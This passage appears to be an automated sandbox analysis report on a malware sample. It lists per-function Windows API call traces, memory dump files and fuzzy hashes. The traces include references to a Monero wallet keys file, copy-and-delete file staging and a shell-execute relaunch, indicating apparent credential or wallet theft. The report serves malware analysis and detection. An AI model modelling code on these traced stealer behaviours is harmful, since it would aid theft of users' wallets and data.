                            • RegCloseKey.ADVAPI32(?), ref: 003C7E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 5b34ea4eecd0326288590d2f71ca95e0273495d980ad2beb0b199cd3f5f22713
                            • Instruction ID: e85c1ecc16446364ce3b0934064599ffd3f32c8200985fa44f81ad494593a789
                            • Opcode Fuzzy Hash: 5b34ea4eecd0326288590d2f71ca95e0273495d980ad2beb0b199cd3f5f22713
                            • Instruction Fuzzy Hash: C3114CB2A44205EBD704DB94DD49FBBBBBCEB08B10F104159FA09E7680D7B85C04DBA2
                            Function 003C9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrStrA.SHLWAPI(0108E410,?,?,?,003C140C,?,0108E410,00000000), ref: 003C926C
                            • lstrcpyn.KERNEL32(005FAB88,0108E410,0108E410,?,003C140C,?,0108E410), ref: 003C9290
                            • lstrlen.KERNEL32(?,?,003C140C,?,0108E410), ref: 003C92A7
                            • wsprintfA.USER32 ref: 003C92C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: 43bbc4e00f3d87f035240d7bcb3cd580fdf1c456c17d71b724d14466df224437
                            • Instruction ID: 0afc4a1688e52f8033987f338d3e6cc24220bfc69061f57e63b56b8b7216a11a
                            • Opcode Fuzzy Hash: 43bbc4e00f3d87f035240d7bcb3cd580fdf1c456c17d71b724d14466df224437
                            • Instruction Fuzzy Hash: 9301A5B650010CFFCB04DFE8D988EAE7BB9EB58354F108548F9099B204C675AA45DB96
                            Function 003B12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B12B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003B12BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003B12D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003B12F5
                            • RegCloseKey.ADVAPI32(?), ref: 003B12FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 6de1493ff53a7841456354805197d34e730598b01b74fe04cfc5db21e95b20e3
                            • Instruction ID: de461f1f6d01fa5fd4c0b9d25407f97388ca57e1dd61a45cad1a211111890de7
                            • Opcode Fuzzy Hash: 6de1493ff53a7841456354805197d34e730598b01b74fe04cfc5db21e95b20e3
                            • Instruction Fuzzy Hash: E1011DB9A40208BBDB00DFE0DC59FAEB7B8EB58705F008159FA09D7280D674AA05DB52
                            Function 003C6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 003C6663
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003C6726
                            • ExitProcess.KERNEL32 ref: 003C6755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 96215c5bfe0e19741e2a98074174527409f348d80b52c97200398a2a5d20273e
                            • Instruction ID: de3325791a949387feadf2249f35d5502da3860e8254146ed7fdc4e3064caf6a
                            • Opcode Fuzzy Hash: 96215c5bfe0e19741e2a98074174527409f348d80b52c97200398a2a5d20273e
                            • Instruction Fuzzy Hash: 17312BB1801218ABDB15EB90DC96FEEB778AF14304F404189F209AA191DF746F49CF6A
                            Function 003C87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003D0E28,00000000,?), ref: 003C882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C8836
                            • wsprintfA.USER32 ref: 003C8850
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 107431fd1c2ee97133d0db320e8aa02ac06d2cc23c1940ed8f67f813f8cef26c
                            • Instruction ID: eb02aa605bd98192b8f31695998ac9afe9cf1e1bae56f1fa0d38a7094a7c130c
                            • Opcode Fuzzy Hash: 107431fd1c2ee97133d0db320e8aa02ac06d2cc23c1940ed8f67f813f8cef26c
                            • Instruction Fuzzy Hash: F9212EB1A40208AFDB04DF94DD49FBEBBB8FB48711F104119F609E7280C7799904DBA2
                            Function 003C8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003C951E,00000000), ref: 003C8D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C8D62
                            • wsprintfW.USER32 ref: 003C8D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 96e46252852f7e68bb1b72765fe20c8edf5b8c67660739748d09aec4fba0a295
                            • Instruction ID: 45d19c428392a369fac70dcddaa074a484131b273cb21eb045a671427a1b5d68
                            • Opcode Fuzzy Hash: 96e46252852f7e68bb1b72765fe20c8edf5b8c67660739748d09aec4fba0a295
                            • Instruction Fuzzy Hash: 00E08CB1A40208BFD700EB94EC0AE6977B8EB04702F000094FD0DD7280DAB59E04EB93
                            Function 003BA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0108A270,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BA2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 003BA3FF
                            • lstrlen.KERNEL32(00000000), ref: 003BA6BC
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 003BA743
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 89e22168bac585afaf29629372cbf581826e2380f19c22c2845c556ea331a733
                            • Instruction ID: 45a04414fe58ab6e23db000ef5c58f42a0aea6b213400c2ccb8614039a16f658
                            • Opcode Fuzzy Hash: 89e22168bac585afaf29629372cbf581826e2380f19c22c2845c556ea331a733
                            • Instruction Fuzzy Hash: 71E1E97281060C9BCB16EBA4DC92FEE7738AF24304F50815DF516EA091EF346E09DB62
                            Function 003BD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0108A270,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BD481
                            • lstrlen.KERNEL32(00000000), ref: 003BD698
                            • lstrlen.KERNEL32(00000000), ref: 003BD6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 003BD72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: ea189af2326d893e89717b926fac8e1e9646eeb19d577e6cd7a8b1b1df44c0fc
                            • Instruction ID: a2349fd213a706ac3c828e9b21bd9d622de5ba841e1a3b936be68ed60a1c67ce
                            • Opcode Fuzzy Hash: ea189af2326d893e89717b926fac8e1e9646eeb19d577e6cd7a8b1b1df44c0fc
                            • Instruction Fuzzy Hash: EE91DA7291060C9BDB16EBA4DC96FEE7738AF14308F50416DF506EA091EF346E09DB62
                            Function 003BD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0108A270,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BD801
                            • lstrlen.KERNEL32(00000000), ref: 003BD99F
                            • lstrlen.KERNEL32(00000000), ref: 003BD9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 003BDA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: ce1c3df62e164ab89c21eba519cce1b68cd5d9d76cc6044fb9958d8ce220de39
                            • Instruction ID: 253ac9c01c77773b389115077990a05e9d41a1f7c9906855fa44cff7bb934692
                            • Opcode Fuzzy Hash: ce1c3df62e164ab89c21eba519cce1b68cd5d9d76cc6044fb9958d8ce220de39
                            • Instruction Fuzzy Hash: CB81DB7291060C9BDB06FBA4DC96EEE7738AF14308F50452DF506EA091EF346E09DB62
                            Function 003BF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                              • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                              • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                              • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                              • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                              • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                              • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003D1580,003D0D92), ref: 003BF54C
                            • lstrlen.KERNEL32(00000000), ref: 003BF56B
                            Strings
                            Memory Dump Source
